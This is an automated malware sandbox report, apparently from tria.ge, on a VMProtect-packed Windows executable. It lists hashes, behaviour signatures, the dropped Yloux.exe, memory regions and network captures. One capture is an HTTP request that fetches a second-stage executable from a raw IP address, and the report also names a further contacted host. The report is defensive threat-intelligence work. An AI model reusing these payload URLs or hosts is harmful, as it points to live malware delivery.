Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    21/11/2023, 01:28 UTC

General

  • Target

    944650d3da8b81e951b69bf7572f3069eaa542eb8812d6d5785c9a5dc1e8820d.x.exe

  • Size

    5.5MB

  • MD5

    d7bafb9a979dd8d4398e49874b0658a0

  • SHA1

    3bef518b3a2eae1fbc56aa5b464da7476ea7217d

  • SHA256

    944650d3da8b81e951b69bf7572f3069eaa542eb8812d6d5785c9a5dc1e8820d

  • SHA512

    3d6c755d63ab5afbb79161c83a39912270a086cb954ba59b91ad4231a8293c598c2f0d78735c9c2300ff9dcf8653ac0486b68ec4092cec0980b83c0713b619a1

  • SSDEEP

    98304:9QqNNOWs0J5jnfZai4UZ0x+SKzHjn5jJujrqjne1uikKmkww91wjbLHbXpoq:9fN4W/rjhBhZ0Pmn5FpjniSI1ULHdN

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Enumerates connected drives 3 TTPs 22 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\944650d3da8b81e951b69bf7572f3069eaa542eb8812d6d5785c9a5dc1e8820d.x.exe
    "C:\Users\Admin\AppData\Local\Temp\944650d3da8b81e951b69bf7572f3069eaa542eb8812d6d5785c9a5dc1e8820d.x.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\windows\Runn\Yloux.exe
      "C:\windows\Runn\Yloux.exe"
      2⤵
      • Executes dropped EXE
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:2760
  • C:\Users\Admin\AppData\Local\Temp\{2113BA9C-2D32-4950-AFC3-AF051E8E19BE}.exe
    "C:\Users\Admin\AppData\Local\Temp\{2113BA9C-2D32-4950-AFC3-AF051E8E19BE}.exe" /s "C:\Users\Admin\AppData\Local\Temp\\{E7B6AF26-F358-46b4-9DD8-581B590C05B9}"
    1⤵
    • Executes dropped EXE
    • Modifies registry class
    PID:580

Network

  • flag-us
    GET
    http://38.60.204.65:53261/VSaySomething.exe
    944650d3da8b81e951b69bf7572f3069eaa542eb8812d6d5785c9a5dc1e8820d.x.exe
    Remote address:
    38.60.204.65:53261
    Request
    GET /VSaySomething.exe HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
    Host: 38.60.204.65:53261
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Content-Length: 1071616
    Accept-Ranges: bytes
    Server: HFS 2.3m
    Set-Cookie: HFS_SID_=0.438930934295058; path=/; HttpOnly
    ETag: E04B8E012FD5D03073BFF82CA12D5F3D
    Last-Modified: Wed, 08 Nov 2006 06:07:18 GMT
    Content-Disposition: attachment; filename="VSaySomething.exe";
  • 38.54.101.181:80
    http
    944650d3da8b81e951b69bf7572f3069eaa542eb8812d6d5785c9a5dc1e8820d.x.exe
    81.2kB
    3.8MB
    1547
    2701
  • 38.60.204.65:53261
    http://38.60.204.65:53261/VSaySomething.exe
    http
    944650d3da8b81e951b69bf7572f3069eaa542eb8812d6d5785c9a5dc1e8820d.x.exe
    32.1kB
    1.1MB
    693
    1341

    HTTP Request

    GET http://38.60.204.65:53261/VSaySomething.exe

    HTTP Response

    200
  • 103.60.220.87:2023
    Yloux.exe
    9.9kB
    252.1kB
    100
    186
  • 103.60.220.87:2023
    Yloux.exe
    7.1kB
    612 B
    23
    12
No results found

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RegWorkshop.ini

    Filesize

    2KB

    MD5

    ff0c7c2667dff4f3ed588f40d047c642

    SHA1

    1162c83bd0bb0d81b7ab7f616cb012b790aa4adf

    SHA256

    02af5cb061fd8075e9475c45ab20e86cf2bb4ca9511ddad348645ed5183b9fc7

    SHA512

    539b1d443232758b6c60a287f2a40200e6e3ba7353f11f18e29ba265c9569a4610e4a80910f79660368a916576ab9c486efa248bf3257e522ef5bfb3d42ef3c3

  • C:\Users\Admin\AppData\Local\Temp\{2113BA9C-2D32-4950-AFC3-AF051E8E19BE}.exe

    Filesize

    1.0MB

    MD5

    217dc98e219a340cb09915244c992a52

    SHA1

    a04f101ca7180955d62e4a1aaeccdcca489209da

    SHA256

    27c8bd76150ddda5b09d6db11f67269cee2eecac345df67f93aab3e3aaabde7c

    SHA512

    dddc15992533c8c13000163c7dd59b20e2fbdedbf611338c04f6f9209ec1a95d1f93aaeeae2778890214d333320978f5d2554348722ea6c8489320f0ef1c4c85

  • C:\Users\Admin\AppData\Local\Temp\{E7B6AF26-F358-46b4-9DD8-581B590C05B9}

    Filesize

    215B

    MD5

    6a1c3fecfd7165643a07b1348d3244b3

    SHA1

    0c3b8b1796487e7e1b037eb82d4f7929df4847e4

    SHA256

    802a60cf636fefb93cebe548b9e397748a8e7bf618c219d035139def9f82a642

    SHA512

    de042dc477775e022afb1440bc2c24f26a7c50c29de1e523a92b1a01cd5308db327b7aa9a80ab6fd37b94632a835d37da045cd78fbb6090275f1778a38252521

  • C:\Windows\Runn\Yloux.exe

    Filesize

    324KB

    MD5

    f64170c793fb8568738cfd1857783a9d

    SHA1

    7f1acc4459e99996f025896894d697b7c2f0b84d

    SHA256

    4928635e712fdfd584eb5d25278e42e69eb7ab6c12bc3c1fca95a0f71692c33d

    SHA512

    3059de955d256c098a84e71d04a31e81eeac8c2893971fabe8d4e18f0986241460911f455d00f5693720bc13c0edbe3c421d7f88788bc10027a75cf97a13b218

  • C:\windows\Runn\1.bin

    Filesize

    378KB

    MD5

    5a189470b11373b448bace9315c0f6ac

    SHA1

    add6f55b32662ace0599c28230fcc8b0f6f1042f

    SHA256

    f6b365099879bf8eee77206451634992da91e76c69606ccfcbc12a927c02873a

    SHA512

    6f0d8b3ad532bf22045cbb3362355711ce7c6d2a09c5b546572084eda12c0fab31d7fdd1f3ff22d016108f1ca5aa1b4ceefd2e5f904bf4d96cfc3291ac9dc09e

  • C:\windows\Runn\Yloux.exe

    Filesize

    324KB

    MD5

    f64170c793fb8568738cfd1857783a9d

    SHA1

    7f1acc4459e99996f025896894d697b7c2f0b84d

    SHA256

    4928635e712fdfd584eb5d25278e42e69eb7ab6c12bc3c1fca95a0f71692c33d

    SHA512

    3059de955d256c098a84e71d04a31e81eeac8c2893971fabe8d4e18f0986241460911f455d00f5693720bc13c0edbe3c421d7f88788bc10027a75cf97a13b218

  • \Users\Admin\AppData\Local\Temp\{2113BA9C-2D32-4950-AFC3-AF051E8E19BE}.exe

    Filesize

    1.0MB

    MD5

    217dc98e219a340cb09915244c992a52

    SHA1

    a04f101ca7180955d62e4a1aaeccdcca489209da

    SHA256

    27c8bd76150ddda5b09d6db11f67269cee2eecac345df67f93aab3e3aaabde7c

    SHA512

    dddc15992533c8c13000163c7dd59b20e2fbdedbf611338c04f6f9209ec1a95d1f93aaeeae2778890214d333320978f5d2554348722ea6c8489320f0ef1c4c85

  • \Windows\Runn\Yloux.exe

    Filesize

    324KB

    MD5

    f64170c793fb8568738cfd1857783a9d

    SHA1

    7f1acc4459e99996f025896894d697b7c2f0b84d

    SHA256

    4928635e712fdfd584eb5d25278e42e69eb7ab6c12bc3c1fca95a0f71692c33d

    SHA512

    3059de955d256c098a84e71d04a31e81eeac8c2893971fabe8d4e18f0986241460911f455d00f5693720bc13c0edbe3c421d7f88788bc10027a75cf97a13b218

  • memory/2604-179-0x0000000001270000-0x0000000001B25000-memory.dmp

    Filesize

    8.7MB

  • memory/2604-11-0x0000000010000000-0x0000000010381000-memory.dmp

    Filesize

    3.5MB

  • memory/2604-3-0x0000000001270000-0x0000000001B25000-memory.dmp

    Filesize

    8.7MB

  • memory/2604-10-0x0000000003130000-0x00000000034AD000-memory.dmp

    Filesize

    3.5MB

  • memory/2604-34-0x0000000001270000-0x0000000001B25000-memory.dmp

    Filesize

    8.7MB

  • memory/2604-5-0x00000000000F0000-0x00000000000F1000-memory.dmp

    Filesize

    4KB

  • memory/2604-8-0x0000000077940000-0x0000000077941000-memory.dmp

    Filesize

    4KB

  • memory/2604-6-0x0000000001270000-0x0000000001B25000-memory.dmp

    Filesize

    8.7MB

  • memory/2604-2-0x00000000000F0000-0x00000000000F1000-memory.dmp

    Filesize

    4KB

  • memory/2604-0-0x00000000000F0000-0x00000000000F1000-memory.dmp

    Filesize

    4KB

  • memory/2760-190-0x0000000180000000-0x0000000180066000-memory.dmp

    Filesize

    408KB

  • memory/2760-196-0x0000000002AA0000-0x0000000002AE2000-memory.dmp

    Filesize

    264KB

  • memory/2760-187-0x0000000180000000-0x0000000180066000-memory.dmp

    Filesize

    408KB

  • memory/2760-180-0x0000000180000000-0x0000000180066000-memory.dmp

    Filesize

    408KB

  • memory/2760-191-0x0000000180000000-0x0000000180066000-memory.dmp

    Filesize

    408KB

  • memory/2760-192-0x0000000000400000-0x0000000000453000-memory.dmp

    Filesize

    332KB

  • memory/2760-193-0x0000000180000000-0x0000000180066000-memory.dmp

    Filesize

    408KB

  • memory/2760-194-0x0000000002110000-0x000000000214C000-memory.dmp

    Filesize

    240KB

  • memory/2760-195-0x0000000002AA0000-0x0000000002AE2000-memory.dmp

    Filesize

    264KB

  • memory/2760-186-0x0000000180000000-0x0000000180066000-memory.dmp

    Filesize

    408KB

  • memory/2760-197-0x0000000002AA0000-0x0000000002AE2000-memory.dmp

    Filesize

    264KB

  • memory/2760-198-0x0000000002AA0000-0x0000000002AE2000-memory.dmp

    Filesize

    264KB

  • memory/2760-199-0x0000000002AA0000-0x0000000002AE2000-memory.dmp

    Filesize

    264KB

  • memory/2760-200-0x0000000180000000-0x0000000180066000-memory.dmp

    Filesize

    408KB

  • memory/2760-201-0x0000000180000000-0x0000000180066000-memory.dmp

    Filesize

    408KB

  • memory/2760-28-0x0000000000650000-0x0000000000850000-memory.dmp

    Filesize

    2.0MB

  • memory/2760-204-0x0000000000650000-0x0000000000850000-memory.dmp

    Filesize

    2.0MB

  • memory/2760-206-0x0000000002AA0000-0x0000000002AE2000-memory.dmp

    Filesize

    264KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.